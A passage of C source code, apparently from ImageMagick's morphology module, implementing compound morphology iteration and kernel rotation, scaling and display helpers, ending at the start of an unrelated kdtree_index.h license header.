stage_limit = 4;
break;
case OpenMorphology: /* 2 primitive compound morphology */
case OpenIntensityMorphology:
case TopHatMorphology:
case CloseMorphology:
case CloseIntensityMorphology:
case BottomHatMorphology:
case EdgeMorphology:
stage_limit = 2;
break;
case HitAndMissMorphology:
rslt_compose = LightenCompositeOp; /* Union of multi-kernel results */
/* FALL THUR */
case ThinningMorphology:
case ThickenMorphology:
method_limit = kernel_limit; /* iterate the whole method */
kernel_limit = 1; /* do not do kernel iteration */
break;
case DistanceMorphology:
kernel_limit = 1; /* Can not iterate direct modify in main loop - yet */
break;
default:
break;
}
/* Handle user (caller) specified multi-kernel composition method */
if ( compose != UndefinedCompositeOp )
rslt_compose = compose; /* override default composition for method */
if ( rslt_compose == UndefinedCompositeOp )
rslt_compose = NoCompositeOp; /* still not defined! Then re-iterate */
/* Some methods require a reflected kernel to use with primitives.
* Create the reflected kernel for those methods. */
switch ( method ) {
case CorrelateMorphology:
case CloseMorphology:
case CloseIntensityMorphology:
case BottomHatMorphology:
case SmoothMorphology:
reflected_kernel = CloneKernelInfo(kernel);
if (reflected_kernel == (KernelInfo *) NULL)
goto error_cleanup;
RotateKernelInfo(reflected_kernel,180);
break;
default:
break;
}
/* Loop 1: iterate the compound method */
method_loop = 0;
method_changed = 1;
while ( method_loop < method_limit && method_changed > 0 ) {
method_loop++;
method_changed = 0;
/* Loop 2: iterate over each kernel in a multi-kernel list */
norm_kernel = (KernelInfo *) kernel;
this_kernel = (KernelInfo *) kernel;
rflt_kernel = reflected_kernel;
kernel_number = 0;
while ( norm_kernel != NULL ) {
/* Loop 3: Compound Morphology Staging - Select Primative to apply */
stage_loop = 0; /* the compound morphology stage number */
while ( stage_loop < stage_limit ) {
stage_loop++; /* The stage of the compound morphology */
/* Select primitive morphology for this stage of compound method */
this_kernel = norm_kernel; /* default use unreflected kernel */
primitive = method; /* Assume method is a primitive */
switch( method ) {
case ErodeMorphology: /* just erode */
case EdgeInMorphology: /* erode and image difference */
primitive = ErodeMorphology;
break;
case DilateMorphology: /* just dilate */
case EdgeOutMorphology: /* dilate and image difference */
primitive = DilateMorphology;
break;
case OpenMorphology: /* erode then dialate */
case TopHatMorphology: /* open and image difference */
primitive = ErodeMorphology;
if ( stage_loop == 2 )
primitive = DilateMorphology;
break;
case OpenIntensityMorphology:
primitive = ErodeIntensityMorphology;
if ( stage_loop == 2 )
primitive = DilateIntensityMorphology;
break;
case CloseMorphology: /* dilate, then erode */
case BottomHatMorphology: /* close and image difference */
this_kernel = rflt_kernel; /* use the reflected kernel */
primitive = DilateMorphology;
if ( stage_loop == 2 )
primitive = ErodeMorphology;
break;
case CloseIntensityMorphology:
this_kernel = rflt_kernel; /* use the reflected kernel */
primitive = DilateIntensityMorphology;
if ( stage_loop == 2 )
primitive = ErodeIntensityMorphology;
break;
case SmoothMorphology: /* open, close */
switch ( stage_loop ) {
case 1: /* start an open method, which starts with Erode */
primitive = ErodeMorphology;
break;
case 2: /* now Dilate the Erode */
primitive = DilateMorphology;
break;
case 3: /* Reflect kernel a close */
this_kernel = rflt_kernel; /* use the reflected kernel */
primitive = DilateMorphology;
break;
case 4: /* Finish the Close */
this_kernel = rflt_kernel; /* use the reflected kernel */
primitive = ErodeMorphology;
break;
}
break;
case EdgeMorphology: /* dilate and erode difference */
primitive = DilateMorphology;
if ( stage_loop == 2 ) {
save_image = curr_image; /* save the image difference */
curr_image = (Image *) image;
primitive = ErodeMorphology;
}
break;
case CorrelateMorphology:
/* A Correlation is a Convolution with a reflected kernel.
** However a Convolution is a weighted sum using a reflected
** kernel. It may seem stange to convert a Correlation into a
** Convolution as the Correlation is the simplier method, but
** Convolution is much more commonly used, and it makes sense to
** implement it directly so as to avoid the need to duplicate the
** kernel when it is not required (which is typically the
** default).
*/
this_kernel = rflt_kernel; /* use the reflected kernel */
primitive = ConvolveMorphology;
break;
default:
break;
}
assert( this_kernel != (KernelInfo *) NULL );
/* Extra information for debugging compound operations */
if ( verbose == MagickTrue ) {
if ( stage_limit > 1 )
(void) FormatMagickString(v_info,MaxTextExtent,"%s:%.20g.%.20g -> ",
MagickOptionToMnemonic(MagickMorphologyOptions,method),(double)
method_loop,(double) stage_loop);
else if ( primitive != method )
(void) FormatMagickString(v_info, MaxTextExtent, "%s:%.20g -> ",
MagickOptionToMnemonic(MagickMorphologyOptions, method),(double)
method_loop);
else
v_info[0] = '\0';
}
/* Loop 4: Iterate the kernel with primitive */
kernel_loop = 0;
kernel_changed = 0;
changed = 1;
while ( kernel_loop < kernel_limit && changed > 0 ) {
kernel_loop++; /* the iteration of this kernel */
/* Create a clone as the destination image, if not yet defined */
if ( work_image == (Image *) NULL )
{
work_image=CloneImage(image,0,0,MagickTrue,exception);
if (work_image == (Image *) NULL)
goto error_cleanup;
if (SetImageStorageClass(work_image,DirectClass) == MagickFalse)
{
InheritException(exception,&work_image->exception);
goto error_cleanup;
}
/* work_image->type=image->type; ??? */
}
/* APPLY THE MORPHOLOGICAL PRIMITIVE (curr -> work) */
count++;
if ( method != DistanceMorphology )
changed = MorphologyPrimitive(curr_image, work_image, primitive,
channel, this_kernel, bias, exception);
else
changed = MorphologyPrimitiveDirect(work_image, primitive,
channel, this_kernel, exception);
if ( verbose == MagickTrue ) {
if ( kernel_loop > 1 )
fprintf(stderr, "\n"); /* add end-of-line from previous */
(void) fprintf(stderr, "%s%s%s:%.20g.%.20g #%.20g => Changed %.20g",
v_info,MagickOptionToMnemonic(MagickMorphologyOptions,
primitive),(this_kernel == rflt_kernel ) ? "*" : "",
(double) (method_loop+kernel_loop-1),(double) kernel_number,
(double) count,(double) changed);
}
if ( changed < 0 )
goto error_cleanup;
kernel_changed += changed;
method_changed += changed;
/* prepare next loop */
{ Image *tmp = work_image; /* swap images for iteration */
work_image = curr_image;
curr_image = tmp;
}
if ( work_image == image )
work_image = (Image *) NULL; /* replace input 'image' */
} /* End Loop 4: Iterate the kernel with primitive */
if ( verbose == MagickTrue && kernel_changed != (size_t)changed )
fprintf(stderr, " Total %.20g",(double) kernel_changed);
if ( verbose == MagickTrue && stage_loop < stage_limit )
fprintf(stderr, "\n"); /* add end-of-line before looping */
#if 0
fprintf(stderr, "--E-- image=0x%lx\n", (unsigned long)image);
fprintf(stderr, " curr =0x%lx\n", (unsigned long)curr_image);
fprintf(stderr, " work =0x%lx\n", (unsigned long)work_image);
fprintf(stderr, " save =0x%lx\n", (unsigned long)save_image);
fprintf(stderr, " union=0x%lx\n", (unsigned long)rslt_image);
#endif
} /* End Loop 3: Primative (staging) Loop for Coumpound Methods */
/* Final Post-processing for some Compound Methods
**
** The removal of any 'Sync' channel flag in the Image Compositon
** below ensures the methematical compose method is applied in a
** purely mathematical way, and only to the selected channels.
** Turn off SVG composition 'alpha blending'.
*/
switch( method ) {
case EdgeOutMorphology:
case EdgeInMorphology:
case TopHatMorphology:
case BottomHatMorphology:
if ( verbose == MagickTrue )
fprintf(stderr, "\n%s: Difference with original image",
MagickOptionToMnemonic(MagickMorphologyOptions, method) );
(void) CompositeImageChannel(curr_image,
(ChannelType) (channel & ~SyncChannels),
DifferenceCompositeOp, image, 0, 0);
break;
case EdgeMorphology:
if ( verbose == MagickTrue )
fprintf(stderr, "\n%s: Difference of Dilate and Erode",
MagickOptionToMnemonic(MagickMorphologyOptions, method) );
(void) CompositeImageChannel(curr_image,
(ChannelType) (channel & ~SyncChannels),
DifferenceCompositeOp, save_image, 0, 0);
save_image = DestroyImage(save_image); /* finished with save image */
break;
default:
break;
}
/* multi-kernel handling: re-iterate, or compose results */
if ( kernel->next == (KernelInfo *) NULL )
rslt_image = curr_image; /* just return the resulting image */
else if ( rslt_compose == NoCompositeOp )
{ if ( verbose == MagickTrue ) {
if ( this_kernel->next != (KernelInfo *) NULL )
fprintf(stderr, " (re-iterate)");
else
fprintf(stderr, " (done)");
}
rslt_image = curr_image; /* return result, and re-iterate */
}
else if ( rslt_image == (Image *) NULL)
{ if ( verbose == MagickTrue )
fprintf(stderr, " (save for compose)");
rslt_image = curr_image;
curr_image = (Image *) image; /* continue with original image */
}
else
{ /* Add the new 'current' result to the composition
**
** The removal of any 'Sync' channel flag in the Image Compositon
** below ensures the methematical compose method is applied in a
** purely mathematical way, and only to the selected channels.
** IE: Turn off SVG composition 'alpha blending'.
*/
if ( verbose == MagickTrue )
fprintf(stderr, " (compose \"%s\")",
MagickOptionToMnemonic(MagickComposeOptions, rslt_compose) );
(void) CompositeImageChannel(rslt_image,
(ChannelType) (channel & ~SyncChannels), rslt_compose,
curr_image, 0, 0);
curr_image = DestroyImage(curr_image);
curr_image = (Image *) image; /* continue with original image */
}
if ( verbose == MagickTrue )
fprintf(stderr, "\n");
/* loop to the next kernel in a multi-kernel list */
norm_kernel = norm_kernel->next;
if ( rflt_kernel != (KernelInfo *) NULL )
rflt_kernel = rflt_kernel->next;
kernel_number++;
} /* End Loop 2: Loop over each kernel */
} /* End Loop 1: compound method interation */
goto exit_cleanup;
/* Yes goto's are bad, but it makes cleanup lot more efficient */
error_cleanup:
if ( curr_image == rslt_image )
curr_image = (Image *) NULL;
if ( rslt_image != (Image *) NULL )
rslt_image = DestroyImage(rslt_image);
exit_cleanup:
if ( curr_image == rslt_image || curr_image == image )
curr_image = (Image *) NULL;
if ( curr_image != (Image *) NULL )
curr_image = DestroyImage(curr_image);
if ( work_image != (Image *) NULL )
work_image = DestroyImage(work_image);
if ( save_image != (Image *) NULL )
save_image = DestroyImage(save_image);
if ( reflected_kernel != (KernelInfo *) NULL )
reflected_kernel = DestroyKernelInfo(reflected_kernel);
return(rslt_image);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% M o r p h o l o g y I m a g e C h a n n e l %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% MorphologyImageChannel() applies a user supplied kernel to the image
% according to the given mophology method.
%
% This function applies any and all user defined settings before calling
% the above internal function MorphologyApply().
%
% User defined settings include...
% * Output Bias for Convolution and correlation ("-bias")
% * Kernel Scale/normalize settings ("-set 'option:convolve:scale'")
% This can also includes the addition of a scaled unity kernel.
% * Show Kernel being applied ("-set option:showkernel 1")
%
% The format of the MorphologyImage method is:
%
% Image *MorphologyImage(const Image *image,MorphologyMethod method,
% const ssize_t iterations,KernelInfo *kernel,ExceptionInfo *exception)
%
% Image *MorphologyImageChannel(const Image *image, const ChannelType
% channel,MorphologyMethod method,const ssize_t iterations,
% KernelInfo *kernel,ExceptionInfo *exception)
%
% A description of each parameter follows:
%
% o image: the image.
%
% o method: the morphology method to be applied.
%
% o iterations: apply the operation this many times (or no change).
% A value of -1 means loop until no change found.
% How this is applied may depend on the morphology method.
% Typically this is a value of 1.
%
% o channel: the channel type.
%
% o kernel: An array of double representing the morphology kernel.
% Warning: kernel may be normalized for the Convolve method.
%
% o exception: return any errors or warnings in this structure.
%
*/
MagickExport Image *MorphologyImageChannel(const Image *image,
const ChannelType channel,const MorphologyMethod method,
const ssize_t iterations,const KernelInfo *kernel,ExceptionInfo *exception)
{
KernelInfo
*curr_kernel;
CompositeOperator
compose;
Image
*morphology_image;
/* Apply Convolve/Correlate Normalization and Scaling Factors.
* This is done BEFORE the ShowKernelInfo() function is called so that
* users can see the results of the 'option:convolve:scale' option.
*/
curr_kernel = (KernelInfo *) kernel;
if ( method == ConvolveMorphology || method == CorrelateMorphology )
{
const char
*artifact;
artifact = GetImageArtifact(image,"convolve:scale");
if ( artifact != (const char *)NULL ) {
if ( curr_kernel == kernel )
curr_kernel = CloneKernelInfo(kernel);
if (curr_kernel == (KernelInfo *) NULL) {
curr_kernel=DestroyKernelInfo(curr_kernel);
return((Image *) NULL);
}
ScaleGeometryKernelInfo(curr_kernel, artifact);
}
}
/* display the (normalized) kernel via stderr */
if ( IsMagickTrue(GetImageArtifact(image,"showkernel"))
|| IsMagickTrue(GetImageArtifact(image,"convolve:showkernel"))
|| IsMagickTrue(GetImageArtifact(image,"morphology:showkernel")) )
ShowKernelInfo(curr_kernel);
/* Override the default handling of multi-kernel morphology results
* If 'Undefined' use the default method
* If 'None' (default for 'Convolve') re-iterate previous result
* Otherwise merge resulting images using compose method given.
* Default for 'HitAndMiss' is 'Lighten'.
*/
{ const char
*artifact;
artifact = GetImageArtifact(image,"morphology:compose");
compose = UndefinedCompositeOp; /* use default for method */
if ( artifact != (const char *) NULL)
compose = (CompositeOperator) ParseMagickOption(
MagickComposeOptions,MagickFalse,artifact);
}
/* Apply the Morphology */
morphology_image = MorphologyApply(image, channel, method, iterations,
curr_kernel, compose, image->bias, exception);
/* Cleanup and Exit */
if ( curr_kernel != kernel )
curr_kernel=DestroyKernelInfo(curr_kernel);
return(morphology_image);
}
MagickExport Image *MorphologyImage(const Image *image, const MorphologyMethod
method, const ssize_t iterations,const KernelInfo *kernel, ExceptionInfo
*exception)
{
Image
*morphology_image;
morphology_image=MorphologyImageChannel(image,DefaultChannels,method,
iterations,kernel,exception);
return(morphology_image);
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
+ R o t a t e K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% RotateKernelInfo() rotates the kernel by the angle given.
%
% Currently it is restricted to 90 degree angles, of either 1D kernels
% or square kernels. And 'circular' rotations of 45 degrees for 3x3 kernels.
% It will ignore usless rotations for specific 'named' built-in kernels.
%
% The format of the RotateKernelInfo method is:
%
% void RotateKernelInfo(KernelInfo *kernel, double angle)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel
%
% o angle: angle to rotate in degrees
%
% This function is currently internal to this module only, but can be exported
% to other modules if needed.
*/
static void RotateKernelInfo(KernelInfo *kernel, double angle)
{
/* angle the lower kernels first */
if ( kernel->next != (KernelInfo *) NULL)
RotateKernelInfo(kernel->next, angle);
/* WARNING: Currently assumes the kernel (rightly) is horizontally symetrical
**
** TODO: expand beyond simple 90 degree rotates, flips and flops
*/
/* Modulus the angle */
angle = fmod(angle, 360.0);
if ( angle < 0 )
angle += 360.0;
if ( 337.5 < angle || angle <= 22.5 )
return; /* Near zero angle - no change! - At least not at this time */
/* Handle special cases */
switch (kernel->type) {
/* These built-in kernels are cylindrical kernels, rotating is useless */
case GaussianKernel:
case DoGKernel:
case LoGKernel:
case DiskKernel:
case PeaksKernel:
case LaplacianKernel:
case ChebyshevKernel:
case ManhattanKernel:
case EuclideanKernel:
return;
/* These may be rotatable at non-90 angles in the future */
/* but simply rotating them in multiples of 90 degrees is useless */
case SquareKernel:
case DiamondKernel:
case PlusKernel:
case CrossKernel:
return;
/* These only allows a +/-90 degree rotation (by transpose) */
/* A 180 degree rotation is useless */
case BlurKernel:
case RectangleKernel:
if ( 135.0 < angle && angle <= 225.0 )
return;
if ( 225.0 < angle && angle <= 315.0 )
angle -= 180;
break;
default:
break;
}
/* Attempt rotations by 45 degrees */
if ( 22.5 < fmod(angle,90.0) && fmod(angle,90.0) <= 67.5 )
{
if ( kernel->width == 3 && kernel->height == 3 )
{ /* Rotate a 3x3 square by 45 degree angle */
MagickRealType t = kernel->values[0];
kernel->values[0] = kernel->values[3];
kernel->values[3] = kernel->values[6];
kernel->values[6] = kernel->values[7];
kernel->values[7] = kernel->values[8];
kernel->values[8] = kernel->values[5];
kernel->values[5] = kernel->values[2];
kernel->values[2] = kernel->values[1];
kernel->values[1] = t;
/* rotate non-centered origin */
if ( kernel->x != 1 || kernel->y != 1 ) {
ssize_t x,y;
x = (ssize_t) kernel->x-1;
y = (ssize_t) kernel->y-1;
if ( x == y ) x = 0;
else if ( x == 0 ) x = -y;
else if ( x == -y ) y = 0;
else if ( y == 0 ) y = x;
kernel->x = (ssize_t) x+1;
kernel->y = (ssize_t) y+1;
}
angle = fmod(angle+315.0, 360.0); /* angle reduced 45 degrees */
kernel->angle = fmod(kernel->angle+45.0, 360.0);
}
else
perror("Unable to rotate non-3x3 kernel by 45 degrees");
}
if ( 45.0 < fmod(angle, 180.0) && fmod(angle,180.0) <= 135.0 )
{
if ( kernel->width == 1 || kernel->height == 1 )
{ /* Do a transpose of a 1 dimentional kernel,
** which results in a fast 90 degree rotation of some type.
*/
ssize_t
t;
t = (ssize_t) kernel->width;
kernel->width = kernel->height;
kernel->height = (size_t) t;
t = kernel->x;
kernel->x = kernel->y;
kernel->y = t;
if ( kernel->width == 1 ) {
angle = fmod(angle+270.0, 360.0); /* angle reduced 90 degrees */
kernel->angle = fmod(kernel->angle+90.0, 360.0);
} else {
angle = fmod(angle+90.0, 360.0); /* angle increased 90 degrees */
kernel->angle = fmod(kernel->angle+270.0, 360.0);
}
}
else if ( kernel->width == kernel->height )
{ /* Rotate a square array of values by 90 degrees */
{ register size_t
i,j,x,y;
register MagickRealType
*k,t;
k=kernel->values;
for( i=0, x=kernel->width-1; i<=x; i++, x--)
for( j=0, y=kernel->height-1; j<y; j++, y--)
{ t = k[i+j*kernel->width];
k[i+j*kernel->width] = k[j+x*kernel->width];
k[j+x*kernel->width] = k[x+y*kernel->width];
k[x+y*kernel->width] = k[y+i*kernel->width];
k[y+i*kernel->width] = t;
}
}
/* rotate the origin - relative to center of array */
{ register ssize_t x,y;
x = (ssize_t) (kernel->x*2-kernel->width+1);
y = (ssize_t) (kernel->y*2-kernel->height+1);
kernel->x = (ssize_t) ( -y +(ssize_t) kernel->width-1)/2;
kernel->y = (ssize_t) ( +x +(ssize_t) kernel->height-1)/2;
}
angle = fmod(angle+270.0, 360.0); /* angle reduced 90 degrees */
kernel->angle = fmod(kernel->angle+90.0, 360.0);
}
else
perror("Unable to rotate a non-square, non-linear kernel 90 degrees");
}
if ( 135.0 < angle && angle <= 225.0 )
{
/* For a 180 degree rotation - also know as a reflection
* This is actually a very very common operation!
* Basically all that is needed is a reversal of the kernel data!
* And a reflection of the origon
*/
size_t
i,j;
register double
*k,t;
k=kernel->values;
for ( i=0, j=kernel->width*kernel->height-1; i<j; i++, j--)
t=k[i], k[i]=k[j], k[j]=t;
kernel->x = (ssize_t) kernel->width - kernel->x - 1;
kernel->y = (ssize_t) kernel->height - kernel->y - 1;
angle = fmod(angle-180.0, 360.0); /* angle+180 degrees */
kernel->angle = fmod(kernel->angle+180.0, 360.0);
}
/* At this point angle should at least between -45 (315) and +45 degrees
* In the future some form of non-orthogonal angled rotates could be
* performed here, posibily with a linear kernel restriction.
*/
return;
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% S c a l e G e o m e t r y K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ScaleGeometryKernelInfo() takes a geometry argument string, typically
% provided as a "-set option:convolve:scale {geometry}" user setting,
% and modifies the kernel according to the parsed arguments of that setting.
%
% The first argument (and any normalization flags) are passed to
% ScaleKernelInfo() to scale/normalize the kernel. The second argument
% is then passed to UnityAddKernelInfo() to add a scled unity kernel
% into the scaled/normalized kernel.
%
% The format of the ScaleGeometryKernelInfo method is:
%
% void ScaleGeometryKernelInfo(KernelInfo *kernel,
% const double scaling_factor,const MagickStatusType normalize_flags)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel to modify
%
% o geometry:
% The geometry string to parse, typically from the user provided
% "-set option:convolve:scale {geometry}" setting.
%
*/
MagickExport void ScaleGeometryKernelInfo (KernelInfo *kernel,
const char *geometry)
{
GeometryFlags
flags;
GeometryInfo
args;
SetGeometryInfo(&args);
flags = (GeometryFlags) ParseGeometry(geometry, &args);
#if 0
/* For Debugging Geometry Input */
fprintf(stderr, "Geometry = 0x%04X : %lg x %lg %+lg %+lg\n",
flags, args.rho, args.sigma, args.xi, args.psi );
#endif
if ( (flags & PercentValue) != 0 ) /* Handle Percentage flag*/
args.rho *= 0.01, args.sigma *= 0.01;
if ( (flags & RhoValue) == 0 ) /* Set Defaults for missing args */
args.rho = 1.0;
if ( (flags & SigmaValue) == 0 )
args.sigma = 0.0;
/* Scale/Normalize the input kernel */
ScaleKernelInfo(kernel, args.rho, flags);
/* Add Unity Kernel, for blending with original */
if ( (flags & SigmaValue) != 0 )
UnityAddKernelInfo(kernel, args.sigma);
return;
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% S c a l e K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ScaleKernelInfo() scales the given kernel list by the given amount, with or
% without normalization of the sum of the kernel values (as per given flags).
%
% By default (no flags given) the values within the kernel is scaled
% directly using given scaling factor without change.
%
% If either of the two 'normalize_flags' are given the kernel will first be
% normalized and then further scaled by the scaling factor value given.
%
% Kernel normalization ('normalize_flags' given) is designed to ensure that
% any use of the kernel scaling factor with 'Convolve' or 'Correlate'
% morphology methods will fall into -1.0 to +1.0 range. Note that for
% non-HDRI versions of IM this may cause images to have any negative results
% clipped, unless some 'bias' is used.
%
% More specifically. Kernels which only contain positive values (such as a
% 'Gaussian' kernel) will be scaled so that those values sum to +1.0,
% ensuring a 0.0 to +1.0 output range for non-HDRI images.
%
% For Kernels that contain some negative values, (such as 'Sharpen' kernels)
% the kernel will be scaled by the absolute of the sum of kernel values, so
% that it will generally fall within the +/- 1.0 range.
%
% For kernels whose values sum to zero, (such as 'Laplician' kernels) kernel
% will be scaled by just the sum of the postive values, so that its output
% range will again fall into the +/- 1.0 range.
%
% For special kernels designed for locating shapes using 'Correlate', (often
% only containing +1 and -1 values, representing foreground/brackground
% matching) a special normalization method is provided to scale the positive
% values separately to those of the negative values, so the kernel will be
% forced to become a zero-sum kernel better suited to such searches.
%
% WARNING: Correct normalization of the kernel assumes that the '*_range'
% attributes within the kernel structure have been correctly set during the
% kernels creation.
%
% NOTE: The values used for 'normalize_flags' have been selected specifically
% to match the use of geometry options, so that '!' means NormalizeValue, '^'
% means CorrelateNormalizeValue. All other GeometryFlags values are ignored.
%
% The format of the ScaleKernelInfo method is:
%
% void ScaleKernelInfo(KernelInfo *kernel, const double scaling_factor,
% const MagickStatusType normalize_flags )
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel
%
% o scaling_factor:
% multiply all values (after normalization) by this factor if not
% zero. If the kernel is normalized regardless of any flags.
%
% o normalize_flags:
% GeometryFlags defining normalization method to use.
% specifically: NormalizeValue, CorrelateNormalizeValue,
% and/or PercentValue
%
*/
MagickExport void ScaleKernelInfo(KernelInfo *kernel,
const double scaling_factor,const GeometryFlags normalize_flags)
{
register ssize_t
i;
register double
pos_scale,
neg_scale;
/* do the other kernels in a multi-kernel list first */
if ( kernel->next != (KernelInfo *) NULL)
ScaleKernelInfo(kernel->next, scaling_factor, normalize_flags);
/* Normalization of Kernel */
pos_scale = 1.0;
if ( (normalize_flags&NormalizeValue) != 0 ) {
if ( fabs(kernel->positive_range + kernel->negative_range) > MagickEpsilon )
/* non-zero-summing kernel (generally positive) */
pos_scale = fabs(kernel->positive_range + kernel->negative_range);
else
/* zero-summing kernel */
pos_scale = kernel->positive_range;
}
/* Force kernel into a normalized zero-summing kernel */
if ( (normalize_flags&CorrelateNormalizeValue) != 0 ) {
pos_scale = ( fabs(kernel->positive_range) > MagickEpsilon )
? kernel->positive_range : 1.0;
neg_scale = ( fabs(kernel->negative_range) > MagickEpsilon )
? -kernel->negative_range : 1.0;
}
else
neg_scale = pos_scale;
/* finialize scaling_factor for positive and negative components */
pos_scale = scaling_factor/pos_scale;
neg_scale = scaling_factor/neg_scale;
for (i=0; i < (ssize_t) (kernel->width*kernel->height); i++)
if ( ! IsNan(kernel->values[i]) )
kernel->values[i] *= (kernel->values[i] >= 0) ? pos_scale : neg_scale;
/* convolution output range */
kernel->positive_range *= pos_scale;
kernel->negative_range *= neg_scale;
/* maximum and minimum values in kernel */
kernel->maximum *= (kernel->maximum >= 0.0) ? pos_scale : neg_scale;
kernel->minimum *= (kernel->minimum >= 0.0) ? pos_scale : neg_scale;
/* swap kernel settings if user's scaling factor is negative */
if ( scaling_factor < MagickEpsilon ) {
double t;
t = kernel->positive_range;
kernel->positive_range = kernel->negative_range;
kernel->negative_range = t;
t = kernel->maximum;
kernel->maximum = kernel->minimum;
kernel->minimum = 1;
}
return;
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% S h o w K e r n e l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ShowKernelInfo() outputs the details of the given kernel defination to
% standard error, generally due to a users 'showkernel' option request.
%
% The format of the ShowKernel method is:
%
% void ShowKernelInfo(KernelInfo *kernel)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel
%
*/
MagickExport void ShowKernelInfo(KernelInfo *kernel)
{
KernelInfo
*k;
size_t
c, i, u, v;
for (c=0, k=kernel; k != (KernelInfo *) NULL; c++, k=k->next ) {
fprintf(stderr, "Kernel");
if ( kernel->next != (KernelInfo *) NULL )
fprintf(stderr, " #%lu", (unsigned long) c );
fprintf(stderr, " \"%s",
MagickOptionToMnemonic(MagickKernelOptions, k->type) );
if ( fabs(k->angle) > MagickEpsilon )
fprintf(stderr, "@%lg", k->angle);
fprintf(stderr, "\" of size %lux%lu%+ld%+ld",(unsigned long) k->width,
(unsigned long) k->height,(long) k->x,(long) k->y);
fprintf(stderr,
" with values from %.*lg to %.*lg\n",
GetMagickPrecision(), k->minimum,
GetMagickPrecision(), k->maximum);
fprintf(stderr, "Forming a output range from %.*lg to %.*lg",
GetMagickPrecision(), k->negative_range,
GetMagickPrecision(), k->positive_range);
if ( fabs(k->positive_range+k->negative_range) < MagickEpsilon )
fprintf(stderr, " (Zero-Summing)\n");
else if ( fabs(k->positive_range+k->negative_range-1.0) < MagickEpsilon )
fprintf(stderr, " (Normalized)\n");
else
fprintf(stderr, " (Sum %.*lg)\n",
GetMagickPrecision(), k->positive_range+k->negative_range);
for (i=v=0; v < k->height; v++) {
fprintf(stderr, "%2lu:", (unsigned long) v );
for (u=0; u < k->width; u++, i++)
if ( IsNan(k->values[i]) )
fprintf(stderr," %*s", GetMagickPrecision()+3, "nan");
else
fprintf(stderr," %*.*lg", GetMagickPrecision()+3,
GetMagickPrecision(), k->values[i]);
fprintf(stderr,"\n");
}
}
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% U n i t y A d d K e r n a l I n f o %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% UnityAddKernelInfo() Adds a given amount of the 'Unity' Convolution Kernel
% to the given pre-scaled and normalized Kernel. This in effect adds that
% amount of the original image into the resulting convolution kernel. This
% value is usually provided by the user as a percentage value in the
% 'convolve:scale' setting.
%
% The resulting effect is to convert the defined kernels into blended
% soft-blurs, unsharp kernels or into sharpening kernels.
%
% The format of the UnityAdditionKernelInfo method is:
%
% void UnityAdditionKernelInfo(KernelInfo *kernel, const double scale )
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel
%
% o scale:
% scaling factor for the unity kernel to be added to
% the given kernel.
%
*/
MagickExport void UnityAddKernelInfo(KernelInfo *kernel,
const double scale)
{
/* do the other kernels in a multi-kernel list first */
if ( kernel->next != (KernelInfo *) NULL)
UnityAddKernelInfo(kernel->next, scale);
/* Add the scaled unity kernel to the existing kernel */
kernel->values[kernel->x+kernel->y*kernel->width] += scale;
CalcKernelMetaData(kernel); /* recalculate the meta-data */
return;
}
/*
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
% %
% %
% %
% Z e r o K e r n e l N a n s %
% %
% %
% %
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%
% ZeroKernelNans() replaces any special 'nan' value that may be present in
% the kernel with a zero value. This is typically done when the kernel will
% be used in special hardware (GPU) convolution processors, to simply
% matters.
%
% The format of the ZeroKernelNans method is:
%
% void ZeroKernelNans (KernelInfo *kernel)
%
% A description of each parameter follows:
%
% o kernel: the Morphology/Convolution kernel
%
*/
MagickExport void ZeroKernelNans(KernelInfo *kernel)
{
register size_t
i;
/* do the other kernels in a multi-kernel list first */
if ( kernel->next != (KernelInfo *) NULL)
ZeroKernelNans(kernel->next);
for (i=0; i < (kernel->width*kernel->height); i++)
if ( IsNan(kernel->values[i]) )
kernel->values[i] = 0.0;
return;
}
|
kdtree_index.h | /***********************************************************************
* Software License Agreement (BSD License)
*
